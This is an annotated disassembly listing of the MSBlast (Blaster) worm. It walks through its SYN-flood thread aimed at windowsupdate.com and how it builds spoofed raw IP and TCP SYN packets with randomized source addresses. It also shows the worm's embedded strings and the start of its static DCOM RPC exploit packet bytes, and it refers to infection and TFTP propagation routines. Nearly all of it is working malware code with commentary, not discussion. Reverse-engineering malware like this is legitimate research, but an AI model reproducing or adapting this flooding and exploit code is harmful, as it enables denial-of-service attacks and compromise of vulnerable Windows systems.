.text:00401EC7 push edi ; s
.text:00401EC8 mov dword ptr [ebp+optval], 1
.text:00401ECF push offset aWindowsupdate_ ; name
.text:00401ED4 call lookupIPAddr ; get IP address of "windowsupdate.com"
.text:00401ED9 pop ecx
.text:00401EDA mov esi, eax
.text:00401EDC push 1 ; dwFlags
.text:00401EDE push 0 ; g
.text:00401EE0 push 0 ; lpProtocolInfo
.text:00401EE2 push 0FFh ; protocol
.text:00401EE7 push 3 ; type
.text:00401EE9 push 2 ; af
.text:00401EEB call WSASocketA ; create raw IP socket
.text:00401EF0 mov edi, eax
.text:00401EF2 cmp eax, 0FFFFFFFFh
.text:00401EF5 jnz short loc_401EFB
.text:00401EF7 xor eax, eax
.text:00401EF9 jmp short loc_401F2F ; return 0
.text:00401EFB ; ---------------------------------------------------------------------------
.text:00401EFB
.text:00401EFB loc_401EFB: ; CODE XREF: WUSYNFloodThread+34^j
.text:00401EFB push 4 ; optlen
.text:00401EFD lea eax, [ebp+optval]
.text:00401F00 push eax ; optval
.text:00401F01 push 2 ; optname
.text:00401F03 push 0 ; level
.text:00401F05 push edi ; s
.text:00401F06 call setsockopt
.text:00401F0B cmp eax, 0FFFFFFFFh
.text:00401F0E jnz short loc_401F14 ; raw IP socket to use
.text:00401F10 xor eax, eax
.text:00401F12 jmp short loc_401F2F
.text:00401F14 ; ---------------------------------------------------------------------------
.text:00401F14
.text:00401F14 loc_401F14: ; CODE XREF: WUSYNFloodThread+4D^j
.text:00401F14 ; WUSYNFloodThread+64vj
.text:00401F14 push edi ; raw IP socket to use
.text:00401F15 push esi ; destination IP address (windowsupdate.com)
.text:00401F16 call sendTCP80SYN
.text:00401F1B add esp, 8
.text:00401F1E push 14h ; dwMilliseconds
.text:00401F20 call Sleep ; sleep for 20ms between SYN packets
.text:00401F25 jmp short loc_401F14 ; raw IP socket to use
.text:00401F27 ; ---------------------------------------------------------------------------
.text:00401F27 push edi
.text:00401F28 call closesocket
.text:00401F2D xor eax, eax
.text:00401F2F
.text:00401F2F loc_401F2F: ; CODE XREF: WUSYNFloodThread+38^j
.text:00401F2F ; WUSYNFloodThread+51^j
.text:00401F2F pop edi
.text:00401F30 pop esi
.text:00401F31 pop ebx
.text:00401F32 leave
.text:00401F33 retn 4
.text:00401F33 WUSYNFloodThread endp
.text:00401F33
.text:00401F36 IPv4 header:
.text:00401F36
.text:00401F36 -14 BYTE version / header len
.text:00401F36 -13 BYTE type of service
.text:00401F36 -12 WORD total length
.text:00401F36 -10 WORD identification
.text:00401F36 -0E BYTE flags
.text:00401F36 -0D BYTE frag offset
.text:00401F36 -0C BYTE time-to-live
.text:00401F36 -0B BYTE protocol
.text:00401F36 -0A WORD checksum
.text:00401F36 -08 DWORD source IP address
.text:00401F36 -04 DWORD dest IP address
.text:00401F36
.text:00401F36 TCP header:
.text:00401F36
.text:00401F36 -28 WORD source port
.text:00401F36 -26 WORD dest port
.text:00401F36 -24 DWORD sequence number
.text:00401F36 -20 DWORD ack number
.text:00401F36 -1C BYTE header length
.text:00401F36 -1B BYTE flags
.text:00401F36 -1A WORD window size
.text:00401F36 -18 WORD checksum
.text:00401F36 -16 WORD urgent pointer
.text:00401F36
.text:00401F36 IP "pseudoheader" for computing TCP checksum (RFC 793):
.text:00401F36
.text:00401F36 -70 DWORD source IP address
.text:00401F36 -6C DWORD dest IP address
.text:00401F36 -68 BYTE 0
.text:00401F36 -67 BYTE protocol (6: TCP)
.text:00401F36 -66 WORD TCP header length
.text:00401F36
.text:00401F36 ; =============== S U B R O U T I N E =======================================
.text:00401F36
.text:00401F36 ; Attributes: bp-based frame
.text:00401F36
.text:00401F36 sendTCP80SYN proc near ; CODE XREF: WUSYNFloodThread+55^p
.text:00401F36
.text:00401F36 temprand2 = dword ptr -9Ch
.text:00401F36 temprand1 = dword ptr -98h
.text:00401F36 name = byte ptr -92h
.text:00401F36 destport = word ptr -82h
.text:00401F36 to = sockaddr ptr -80h
.text:00401F36 pseudoheader = byte ptr -70h
.text:00401F36 buf = byte ptr -64h
.text:00401F36 tcpheader = byte ptr -28h
.text:00401F36 ipv4header = byte ptr -14h
.text:00401F36 dwDestIP = dword ptr 8
.text:00401F36 s = dword ptr 0Ch
.text:00401F36
.text:00401F36 push ebp
.text:00401F37 mov ebp, esp
.text:00401F39 sub esp, 9Ch
.text:00401F3F push ebx
.text:00401F40 push esi
.text:00401F41 push edi
.text:00401F42
.text:00401F42 Initialization
.text:00401F42
.text:00401F42 lea edi, [ebp+buf]
.text:00401F45 lea esi, ds:4047B0h ; g_zerobuf60[]
.text:00401F4B mov ecx, 0Fh
.text:00401F50 rep movsd ; copy 60 byte buffer of zeroes into buf
.text:00401F52 mov [ebp+destport], 50h ; destination port (80)
.text:00401F5B call GetTickCount
.text:00401F60 push eax
.text:00401F61 call srand ; seed random number generator with GetTickCount()
.text:00401F66
.text:00401F66 Create random source address for spoofing
.text:00401F66
.text:00401F66 call rand
.text:00401F6B mov [ebp+temprand1], eax
.text:00401F71 call rand
.text:00401F76 mov ecx, 0FFh
.text:00401F7B cdq
.text:00401F7C idiv ecx
.text:00401F7E push edx ; fourth octet (random 0..254)
.text:00401F7F mov edi, [ebp+temprand1]
.text:00401F85 mov eax, edi
.text:00401F87 mov ecx, 0FFh
.text:00401F8C cdq
.text:00401F8D idiv ecx
.text:00401F8F push edx ; third octet (random 0..254)
.text:00401F90 push ds:synspoofoctet2
.text:00401F96 push ds:synspoofoctet1
.text:00401F9C push offset aI_I_I_I ; "%i.%i.%i.%i"
.text:00401FA1 lea edi, [ebp+name]
.text:00401FA7 push edi
.text:00401FA8 call sprintf
.text:00401FAD lea eax, [ebp+name]
.text:00401FB3 push eax ; name
.text:00401FB4 call lookupIPAddr
.text:00401FB9 mov ebx, eax ; save source address to spoof in EBX
.text:00401FBB
.text:00401FBB Fill in target address (sockaddr) struct
.text:00401FBB
.text:00401FBB mov [ebp+to.sa_family], 2 ; AF_INET
.text:00401FC1 movzx eax, [ebp+destport]
.text:00401FC8 push eax ; hostshort
.text:00401FC9 call htons
.text:00401FCE mov edi, eax
.text:00401FD0 mov word ptr [ebp+to.sa_data], di ; destination port (80)
.text:00401FD4 mov eax, [ebp+dwDestIP]
.text:00401FD7 mov dword ptr [ebp+to.sa_data+2], eax
.text:00401FDA
.text:00401FDA Construct IPv4 header
.text:00401FDA
.text:00401FDA mov [ebp+ipv4header], 45h ; first byte of raw IP packet:
.text:00401FDA ; IPv4 / 20-byte header
.text:00401FDE push 28h ; hostshort
.text:00401FE0 call htons
.text:00401FE5 mov edi, eax
.text:00401FE7 mov word ptr [ebp+ipv4header+2], di ; total length = 40 bytes
.text:00401FEB mov word ptr [ebp+ipv4header+4], 1
.text:00401FF1 mov word ptr [ebp+ipv4header+6], 0 ; flags = 0
.text:00401FF7 mov [ebp+ipv4header+8], 80h ; TTL = 128
.text:00401FFB mov [ebp+ipv4header+9], 6 ; protocol = TCP (6)
.text:00401FFF mov word ptr [ebp+ipv4header+0Ah], 0 ; IP checksum
.text:00402005 mov eax, [ebp+dwDestIP]
.text:00402008 mov dword ptr [ebp+ipv4header+10h], eax ; destination IP (Windows Update)
.text:0040200B
.text:0040200B Begin constructing TCP header
.text:0040200B
.text:0040200B movzx eax, [ebp+destport]
.text:00402012 push eax ; hostshort
.text:00402013 call htons
.text:00402018 mov edi, eax
.text:0040201A mov word ptr [ebp+tcpheader+2], di ; destination port (80)
.text:0040201E and dword ptr [ebp+tcpheader+8], 0 ; zero out ack number
.text:00402022 mov [ebp+tcpheader+0Ch], 50h ; header length (50h --> 20 bytes)
.text:00402026 mov [ebp+tcpheader+0Dh], 2 ; flags: 2 = SYN
.text:0040202A push 4000h ; hostshort
.text:0040202F call htons
.text:00402034 mov edi, eax
.text:00402036 mov word ptr [ebp+tcpheader+0Eh], di ; window size: 16384
.text:0040203A mov word ptr [ebp+tcpheader+12h], 0 ; urgent ptr
.text:00402040 mov word ptr [ebp+tcpheader+10h], 0 ; TCP checksum
.text:00402046 mov eax, dword ptr [ebp+ipv4header+10h]
.text:00402049
.text:00402049 Construct IP pseudoheader
.text:00402049
.text:00402049 mov dword ptr [ebp+pseudoheader+4], eax ; destination IP (windowsupdate.com)
.text:0040204C mov [ebp+pseudoheader+8], 0 ; store 0 in pseudoheader
.text:00402050 mov [ebp+pseudoheader+9], 6 ; store protocol (6: TCP) in pseudoheader
.text:00402054 push 14h ; hostshort
.text:00402056 call htons
.text:0040205B mov edi, eax
.text:0040205D mov word ptr [ebp+pseudoheader+0Ah], di ; store TCP header size (20) in pseudoheader
.text:00402061
.text:00402061 Finish filling in IPv4 and TCP headers
.text:00402061
.text:00402061 mov dword ptr [ebp+ipv4header+0Ch], ebx ; source address
.text:00402064 call rand
.text:00402069 mov ecx, 3E8h
.text:0040206E cdq
.text:0040206F idiv ecx
.text:00402071 mov edi, edx
.text:00402073 add edi, 3E8h
.text:00402079 and edi, 0FFFFh ; (rand() % 1000) + 1000
.text:0040207F push edi ; hostshort
.text:00402080 call htons
.text:00402085 mov edi, eax
.text:00402087 mov word ptr [ebp+tcpheader], di ; first bytes of TCP header:
.text:00402087 ; source port = random 1000..1999
.text:0040208B call rand
.text:00402090 mov [ebp+temprand2], eax
.text:00402096 call rand
.text:0040209B mov edi, [ebp+temprand2]
.text:004020A1 shl edi, 10h
.text:004020A4 or edi, eax
.text:004020A6 and edi, 0FFFFh
.text:004020AC push edi ; hostshort
.text:004020AD call htons ; htons( ((rand() << 16) | rand()) & 0xFFFF )
.text:004020B2 mov edi, eax
.text:004020B4 and edi, 0FFFFh
.text:004020BA mov dword ptr [ebp+tcpheader+4], edi ; sequence number
.text:004020BD mov dword ptr [ebp+pseudoheader], ebx ; source address
.text:004020C0
.text:004020C0 Calculate and store IPv4 and TCP checksums
.text:004020C0
.text:004020C0 push 0Ch
.text:004020C2 lea eax, [ebp+pseudoheader]
.text:004020C5 push eax
.text:004020C6 lea eax, [ebp+buf]
.text:004020C9 push eax
.text:004020CA call memcpy ; copy IP pseudoheader into buf[]
.text:004020CF push 14h
.text:004020D1 lea eax, [ebp+tcpheader]
.text:004020D4 push eax
.text:004020D5 lea eax, [ebp+buf+0Ch] ; &(buf[0x0C])
.text:004020D8 push eax
.text:004020D9 call memcpy ; copy TCP header after pseudoheader into buf[]
.text:004020DE push 20h ; dwLength
.text:004020E0 lea eax, [ebp+buf]
.text:004020E3 push eax ; lpData
.text:004020E4 call computeChecksum ; compute checksum of (IP pseudoheader + TCP header)
.text:004020E9 mov edi, eax
.text:004020EB mov word ptr [ebp+tcpheader+10h], di ; store TCP checksum in TCP header
.text:004020EF push 14h
.text:004020F1 lea eax, [ebp+ipv4header]
.text:004020F4 push eax
.text:004020F5 lea eax, [ebp+buf]
.text:004020F8 push eax
.text:004020F9 call memcpy ; now copy IPv4 header into buf[]
.text:004020FE push 14h
.text:00402100 lea eax, [ebp+tcpheader]
.text:00402103 push eax
.text:00402104 lea eax, [ebp+buf+14h] ; &(buf[0x14])
.text:00402107 push eax
.text:00402108 call memcpy ; copy TCP header after IPv4 header in buf[]
.text:0040210D push 4
.text:0040210F push 0
.text:00402111 lea eax, [ebp+buf+28h]
.text:00402114 push eax
.text:00402115 call memset
.text:0040211A push 28h ; dwLength: 28h (40)
.text:0040211C lea eax, [ebp+buf]
.text:0040211F push eax ; lpData: buf
.text:00402120 call computeChecksum
.text:00402125 mov edi, eax
.text:00402127 mov word ptr [ebp+ipv4header+0Ah], di ; store IPv4 checksum in IPv4 header
.text:0040212B
.text:0040212B Send TCP SYN packet to destination IP address
.text:0040212B
.text:0040212B push 14h
.text:0040212D lea eax, [ebp+ipv4header]
.text:00402130 push eax
.text:00402131 lea eax, [ebp+buf]
.text:00402134 push eax
.text:00402135 call memcpy ; copy IPv4 header to buffer
.text:0040213A add esp, 78h
.text:0040213D push 10h ; tolen
.text:0040213F lea eax, [ebp+to]
.text:00402142 push eax ; to
.text:00402143 push 0 ; flags
.text:00402145 push 28h ; len = 40 bytes
.text:00402147 lea eax, [ebp+buf]
.text:0040214A push eax ; buf
.text:0040214B push [ebp+s] ; s
.text:0040214E call sendto ; -- send 40-byte raw IP packet
.text:00402153 pop edi
.text:00402154 pop esi
.text:00402155 pop ebx
.text:00402156 leave
.text:00402157 retn
.text:00402157 sendTCP80SYN endp
.text:00402157
.text:00402158 ; [00000006 BYTES: COLLAPSED FUNCTION htons. PRESS KEYPAD "+" TO EXPAND]
.text:0040215E dd 9090h
.text:00402162 align 4
.text:00402164 ; [00000006 BYTES: COLLAPSED FUNCTION ioctlsocket. PRESS KEYPAD "+" TO EXPAND]
.text:0040216A align 8
.text:00402170 ; [00000006 BYTES: COLLAPSED FUNCTION inet_addr. PRESS KEYPAD "+" TO EXPAND]
.text:00402176 dd 9090h
.text:0040217A align 4
.text:0040217C ; [00000006 BYTES: COLLAPSED FUNCTION inet_ntoa. PRESS KEYPAD "+" TO EXPAND]
.text:00402182 align 8
.text:00402188 ; [00000006 BYTES: COLLAPSED FUNCTION recvfrom. PRESS KEYPAD "+" TO EXPAND]
.text:0040218E dd 9090h
.text:00402192 align 4
.text:00402194 ; [00000006 BYTES: COLLAPSED FUNCTION select. PRESS KEYPAD "+" TO EXPAND]
.text:0040219A align 8
.text:004021A0 ; [00000006 BYTES: COLLAPSED FUNCTION send. PRESS KEYPAD "+" TO EXPAND]
.text:004021A6 dd 9090h
.text:004021AA align 4
.text:004021AC ; [00000006 BYTES: COLLAPSED FUNCTION sendto. PRESS KEYPAD "+" TO EXPAND]
.text:004021B2 align 8
.text:004021B8 ; [00000006 BYTES: COLLAPSED FUNCTION setsockopt. PRESS KEYPAD "+" TO EXPAND]
.text:004021BE dd 9090h
.text:004021C2 align 4
.text:004021C4 ; [00000006 BYTES: COLLAPSED FUNCTION socket. PRESS KEYPAD "+" TO EXPAND]
.text:004021CA align 8
.text:004021D0 ; [00000006 BYTES: COLLAPSED FUNCTION gethostbyname. PRESS KEYPAD "+" TO EXPAND]
.text:004021D6 dd 9090h
.text:004021DA align 4
.text:004021DC ; [00000006 BYTES: COLLAPSED FUNCTION bind. PRESS KEYPAD "+" TO EXPAND]
.text:004021E2 align 8
.text:004021E8 ; [00000006 BYTES: COLLAPSED FUNCTION gethostname. PRESS KEYPAD "+" TO EXPAND]
.text:004021EE dd 9090h
.text:004021F2 align 4
.text:004021F4 ; [00000006 BYTES: COLLAPSED FUNCTION closesocket. PRESS KEYPAD "+" TO EXPAND]
.text:004021FA align 8
.text:00402200 ; [00000006 BYTES: COLLAPSED FUNCTION WSAStartup. PRESS KEYPAD "+" TO EXPAND]
.text:00402206 dd 9090h
.text:0040220A align 4
.text:0040220C ; [00000006 BYTES: COLLAPSED FUNCTION WSACleanup. PRESS KEYPAD "+" TO EXPAND]
.text:00402212 align 8
.text:00402218 ; [00000006 BYTES: COLLAPSED FUNCTION connect. PRESS KEYPAD "+" TO EXPAND]
.text:0040221E dd 9090h
.text:00402222 align 4
.text:00402224 ; [00000006 BYTES: COLLAPSED FUNCTION getpeername. PRESS KEYPAD "+" TO EXPAND]
.text:0040222A align 8
.text:00402230 ; [00000006 BYTES: COLLAPSED FUNCTION getsockname. PRESS KEYPAD "+" TO EXPAND]
.text:00402236 dd 9090h
.text:0040223A align 4
.text:0040223C ; [00000006 BYTES: COLLAPSED FUNCTION WSASocketA. PRESS KEYPAD "+" TO EXPAND]
.text:00402242 align 8
.text:00402248 ; [00000006 BYTES: COLLAPSED FUNCTION InternetGetConnectedState. PRESS KEYPAD "+" TO EXPAND]
.text:0040224E dd 9090h
.text:00402252 align 4
.text:00402254
.text:00402254 ; =============== S U B R O U T I N E =======================================
.text:00402254
.text:00402254 ; Attributes: bp-based frame
.text:00402254
.text:00402254 sub_402254 proc near ; CODE XREF: start+66^p
.text:00402254
.text:00402254 var_4 = dword ptr -4
.text:00402254
.text:00402254 push ebp
.text:00402255 mov ebp, esp
.text:00402257 push ecx
.text:00402258 push edi
.text:00402259 call GetCommandLineA
.text:0040225E mov edi, eax
.text:00402260 cmp byte ptr [edi], 22h
.text:00402263 jnz short loc_402288
.text:00402265 push 22h
.text:00402267 mov eax, edi
.text:00402269 inc eax
.text:0040226A push eax
.text:0040226B call strchr
.text:00402270 add esp, 8
.text:00402273 mov [ebp+var_4], eax
.text:00402276 or eax, eax
.text:00402278 jz short loc_4022A3
.text:0040227A mov edi, eax
.text:0040227C inc edi
.text:0040227D jmp short loc_402280
.text:0040227F ; ---------------------------------------------------------------------------
.text:0040227F
.text:0040227F loc_40227F: ; CODE XREF: sub_402254+2Fvj
.text:0040227F inc edi
.text:00402280
.text:00402280 loc_402280: ; CODE XREF: sub_402254+29^j
.text:00402280 cmp byte ptr [edi], 20h
.text:00402283 jz short loc_40227F
.text:00402285 jmp short loc_4022A3
.text:00402287 ; ---------------------------------------------------------------------------
.text:00402287
.text:00402287 loc_402287: ; CODE XREF: sub_402254+3Evj
.text:00402287 inc edi
.text:00402288
.text:00402288 loc_402288: ; CODE XREF: sub_402254+F^j
.text:00402288 movsx eax, byte ptr [edi]
.text:0040228B or eax, eax
.text:0040228D jz short loc_402294
.text:0040228F cmp eax, 20h
.text:00402292 jnz short loc_402287
.text:00402294
.text:00402294 loc_402294: ; CODE XREF: sub_402254+39^j
.text:00402294 jmp short loc_402297
.text:00402296 ; ---------------------------------------------------------------------------
.text:00402296
.text:00402296 loc_402296: ; CODE XREF: sub_402254+4Dvj
.text:00402296 inc edi
.text:00402297
.text:00402297 loc_402297: ; CODE XREF: sub_402254+40^j
.text:00402297 movsx eax, byte ptr [edi]
.text:0040229A or eax, eax
.text:0040229C jz short loc_4022A3
.text:0040229E cmp eax, 20h
.text:004022A1 jz short loc_402296
.text:004022A3
.text:004022A3 loc_4022A3: ; CODE XREF: sub_402254+24^j
.text:004022A3 ; sub_402254+31^j ...
.text:004022A3 push 0 ; lpModuleName
.text:004022A5 call GetModuleHandleA
.text:004022AA push 1
.text:004022AC push edi
.text:004022AD push 0
.text:004022AF push eax
.text:004022B0 call WinMain
.text:004022B5 pop edi
.text:004022B6 leave
.text:004022B7 retn
.text:004022B7 sub_402254 endp
.text:004022B7
.text:004022B8
.text:004022B8 ; =============== S U B R O U T I N E =======================================
.text:004022B8
.text:004022B8
.text:004022B8 allocstackspace proc near ; CODE XREF: infectTarget+8^p
.text:004022B8 pop ecx
.text:004022B9
.text:004022B9 loc_4022B9: ; CODE XREF: allocstackspace+14vj
.text:004022B9 sub esp, 1000h
.text:004022BF sub eax, 1000h
.text:004022C4 test [esp], eax
.text:004022C7 cmp eax, 1000h
.text:004022CC jnb short loc_4022B9
.text:004022CE sub esp, eax
.text:004022D0 test [esp], eax
.text:004022D3 jmp ecx
.text:004022D3 allocstackspace endp
.text:004022D3
.text:004022D3 ; ---------------------------------------------------------------------------
.text:004022D5 align 4
.text:004022D8 ; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
.text:004022DE dd 9090h
.text:004022E2 align 4
.text:004022E4 ; [00000006 BYTES: COLLAPSED FUNCTION ExitThread. PRESS KEYPAD "+" TO EXPAND]
.text:004022EA align 8
.text:004022F0 ; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
.text:004022F6 dd 9090h
.text:004022FA align 4
.text:004022FC ; [00000006 BYTES: COLLAPSED FUNCTION GetDateFormatA. PRESS KEYPAD "+" TO EXPAND]
.text:00402302 align 8
.text:00402308 ; [00000006 BYTES: COLLAPSED FUNCTION GetLastError. PRESS KEYPAD "+" TO EXPAND]
.text:0040230E dd 9090h
.text:00402312 align 4
.text:00402314 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
.text:0040231A align 8
.text:00402320 ; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
.text:00402326 dd 9090h
.text:0040232A align 4
.text:0040232C ; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
.text:00402332 align 8
.text:00402338 ; [00000006 BYTES: COLLAPSED FUNCTION GetTickCount. PRESS KEYPAD "+" TO EXPAND]
.text:0040233E dd 9090h
.text:00402342 align 4
.text:00402344 ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
.text:0040234A align 8
.text:00402350 ; [00000006 BYTES: COLLAPSED FUNCTION CreateMutexA. PRESS KEYPAD "+" TO EXPAND]
.text:00402356 dd 9090h
.text:0040235A align 4
.text:0040235C ; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
.text:00402362 align 8
.text:00402368 ; [00000006 BYTES: COLLAPSED FUNCTION TerminateThread. PRESS KEYPAD "+" TO EXPAND]
.text:0040236E dd 9090h
.text:00402372 align 4
.text:00402374 ; [00000006 BYTES: COLLAPSED FUNCTION CreateThread. PRESS KEYPAD "+" TO EXPAND]
.text:0040237A align 8
.text:00402380 ; [00000006 BYTES: COLLAPSED FUNCTION RegCloseKey. PRESS KEYPAD "+" TO EXPAND]
.text:00402386 dd 9090h
.text:0040238A align 4
.text:0040238C ; [00000006 BYTES: COLLAPSED FUNCTION RegCreateKeyExA. PRESS KEYPAD "+" TO EXPAND]
.text:00402392 align 8
.text:00402398 ; [00000006 BYTES: COLLAPSED FUNCTION RegSetValueExA. PRESS KEYPAD "+" TO EXPAND]
.text:0040239E dd 9090h
.text:004023A2 align 4
.text:004023A4 ; [00000006 BYTES: COLLAPSED FUNCTION __GetMainArgs. PRESS KEYPAD "+" TO EXPAND]
.text:004023AA align 8
.text:004023B0 ; [00000006 BYTES: COLLAPSED FUNCTION atoi. PRESS KEYPAD "+" TO EXPAND]
.text:004023B6 dd 9090h
.text:004023BA align 4
.text:004023BC ; [00000006 BYTES: COLLAPSED FUNCTION exit. PRESS KEYPAD "+" TO EXPAND]
.text:004023C2 align 8
.text:004023C8 ; [00000006 BYTES: COLLAPSED FUNCTION fclose. PRESS KEYPAD "+" TO EXPAND]
.text:004023CE dd 9090h
.text:004023D2 align 4
.text:004023D4 ; [00000006 BYTES: COLLAPSED FUNCTION fopen. PRESS KEYPAD "+" TO EXPAND]
.text:004023DA align 8
.text:004023E0 ; [00000006 BYTES: COLLAPSED FUNCTION fread. PRESS KEYPAD "+" TO EXPAND]
.text:004023E6 dd 9090h
.text:004023EA align 4
.text:004023EC ; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
.text:004023F2 align 8
.text:004023F8 ; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
.text:004023FE dd 9090h
.text:00402402 align 4
.text:00402404 ; [00000006 BYTES: COLLAPSED FUNCTION raise. PRESS KEYPAD "+" TO EXPAND]
.text:0040240A align 8
.text:00402410 ; [00000006 BYTES: COLLAPSED FUNCTION rand. PRESS KEYPAD "+" TO EXPAND]
.text:00402416 dd 9090h
.text:0040241A align 4
.text:0040241C ; [00000006 BYTES: COLLAPSED FUNCTION signal. PRESS KEYPAD "+" TO EXPAND]
.text:00402422 align 8
.text:00402428 ; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND]
.text:0040242E dd 9090h
.text:00402432 align 4
.text:00402434 ; [00000006 BYTES: COLLAPSED FUNCTION srand. PRESS KEYPAD "+" TO EXPAND]
.text:0040243A align 8
.text:00402440 ; [00000006 BYTES: COLLAPSED FUNCTION strchr. PRESS KEYPAD "+" TO EXPAND]
.text:00402446 dd 9090h
.text:0040244A align 4
.text:0040244C ; [00000006 BYTES: COLLAPSED FUNCTION strtok. PRESS KEYPAD "+" TO EXPAND]
.text:00402452 align 8
.text:00402452 _text ends
.text:00402452
.bss:00403000 ; Section 2. (virtual address 00003000)
.bss:00403000 ; Virtual size : 0000013C ( 316.)
.bss:00403000 ; Section size in file : 00000000 ( 0.)
.bss:00403000 ; Offset to raw data for section: 00000000
.bss:00403000 ; Flags C0000080: Bss Readable Writable
.bss:00403000 ; Alignment : 16 bytes ?
.bss:00403000 ; ---------------------------------------------------------------------------
.bss:00403000
.bss:00403000 ; Segment type: Uninitialized
.bss:00403000 ; Segment permissions: Read/Write
.bss:00403000 _bss segment para public 'BSS' use32
.bss:00403000 assume cs:_bss
.bss:00403000 ;org 403000h
.bss:00403000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.bss:00403000 ; char cp
.bss:00403000 cp db 10h dup(?) ; DATA XREF: infect20Hosts+91^o
.bss:00403000 ; infect20Hosts+9E^o ...
.bss:00403010 octet2 dd ? ; DATA XREF: WinMain+1C6^w
.bss:00403010 ; WinMain+219^r ...
.bss:00403014 synspoofoctet1 dd ? ; DATA XREF: WinMain+103^w
.bss:00403014 ; WinMain+214^w ...
.bss:00403018 db ? ;
.bss:00403019 db ? ;
.bss:0040301A db ? ;
.bss:0040301B db ? ;
.bss:0040301C db ? ;
.bss:0040301D db ? ;
.bss:0040301E db ? ;
.bss:0040301F db ? ;
.bss:00403020 ; CHAR Filename
.bss:00403020 Filename db 104h dup(?) ; DATA XREF: WinMain+B9^o
.bss:00403020 ; TFTPServerThread+BF^o
.bss:00403020 ; 260 (104h) = MAX_PATH
.bss:00403124 ; SOCKET s
.bss:00403124 s dd ? ; DATA XREF: TFTPServerThread+21^w
.bss:00403124 ; TFTPServerThread+6B^r ...
.bss:00403128 octet1 dd ? ; DATA XREF: WinMain+1A9^w
.bss:00403128 ; WinMain+20F^r ...
.bss:0040312C octet4 dd ? ; DATA XREF: WinMain+E0^w
.bss:0040312C ; incrementOctets^r ...
.bss:00403130 octet3 dd ? ; DATA XREF: WinMain+1E6^w
.bss:00403130 ; WinMain+209^w ...
.bss:00403134 dwWhichRetAddr dd ? ; DATA XREF: WinMain+246^w
.bss:00403134 ; WinMain+262^w ...
.bss:00403138 synspoofoctet2 dd ? ; DATA XREF: WinMain+116^w
.bss:00403138 ; WinMain+21E^w ...
.bss:00403138 _bss ends
.bss:00403138
.data:0040313C ; Section 3. (virtual address 00004000)
.data:0040313C ; Virtual size : 0000088C ( 2188.)
.data:0040313C ; Section size in file : 0000088C ( 2188.)
.data:0040313C ; Offset to raw data for section: 00001A00
.data:0040313C ; Flags C0000040: Data Readable Writable
.data:0040313C ; Alignment : 16 bytes ?
.data:0040313C ; ---------------------------------------------------------------------------
.data:0040313C
.data:0040313C ; Segment type: Pure data
.data:0040313C ; Segment permissions: Read/Write
.data:0040313C _data segment para public 'DATA' use32
.data:0040313C assume cs:_data
.data:0040313C ;org 40313Ch
.data:0040313C align 1000h
.data:00404000 dd offset cp
.data:00404004 dd 40313Ch
.data:00404008 dd 8000h
.data:0040400C dd 0
.data:00404010 dword_404010 dd 0 ; DATA XREF: .text:00401142^w
.data:00404010 ; .text:0040115C^w ...
.data:00404014 dword_404014 dd 0 ; DATA XREF: start+60^w
.data:00404018 db 0 ;
.data:00404019 db 0 ;
.data:0040401A db 0 ;
.data:0040401B db 0 ;
.data:0040401C unk_40401C db 0 ; ; DATA XREF: start+B^o
.data:0040401D db 0 ;
.data:0040401E db 0 ;
.data:0040401F db 0 ;
.data:00404020 dword_404020 dd 0 ; DATA XREF: start+44^o
.data:00404020 ; start+5A^r
.data:00404024 dword_404024 dd 0 ; DATA XREF: start+3F^o
.data:00404024 ; start+54^r
.data:00404028 dword_404028 dd 0 ; DATA XREF: start+3A^o
.data:00404028 ; start+4E^r
.data:0040402C dword_40402C dd 0 ; DATA XREF: .text:004011AA^r
.data:0040402C ; .text:004011BA^r
.data:00404030 dword_404030 dd 0 ; DATA XREF: .text:004010AB^w
.data:00404034 dword_404034 dd 0 ; DATA XREF: .text:004010B0^w
.data:00404034 ; .text:004010C8^w
.data:00404038 dwTFTPInProgress dd 0 ; DATA XREF: TFTPServerThread+C^w
.data:00404038 ; TFTPServerThread+174^w ...
.data:0040403C aMsblast_exe db 'msblast.exe',0 ; DATA XREF: WinMain+31^o
.data:0040403C ; infectTarget+3BA^o ...
.data:00404048 aIJustWantToSay db 'I just want to say LOVE YOU SAN!!',0
.data:0040406A aBillyGatesWhyD db 'billy gates why do you make this possible ? Stop making mone'
.data:0040406A db 'y and fix your software!!',0
.data:004040C0
.data:004040C0 Static exploit packet components (from http://www.metasploit.com/tools/dcom.c)
.data:004040C0
.data:004040C0 bindstr db 5, 0, 0Bh, 3, 10h, 0, 0, 0, 48h, 0, 0, 0, 7Fh, 0, 0, 0; 0
.data:004040C0 db 0D0h, 16h,0D0h, 16h, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0; 16
.data:004040C0 db 0A0h, 1, 0, 0, 0, 0, 0, 0,0C0h, 0, 0, 0, 0, 0, 0, 46h; 32
.data:004040C0 db 0, 0, 0, 0, 4, 5Dh, 88h, 8Ah,0EBh, 1Ch,0C9h, 11h, 9Fh,0E8h, 8, 0; 48
.data:004040C0 db 2Bh, 10h, 48h, 60h, 2, 0, 0, 0; 64
.data:00404108 request1 db 5, 0, 0, 3, 10h, 0, 0, 0,0E8h, 3, 0, 0,0E5h, 0, 0, 0; 0
.data:00404108 db 0D0h, 3, 0, 0, 1, 0, 4, 0, 5, 0, 6, 0, 1, 0, 0, 0; 16
.data:00404108 db 0, 0, 0, 0, 32h, 24h, 58h,0FDh,0CCh, 45h, 64h, 49h,0B0h, 70h,0DDh,0AEh; 32
.data:00404108 db 74h, 2Ch, 96h,0D2h, 60h, 5Eh, 0Dh, 0, 1, 0, 0, 0, 0, 0, 0, 0; 48
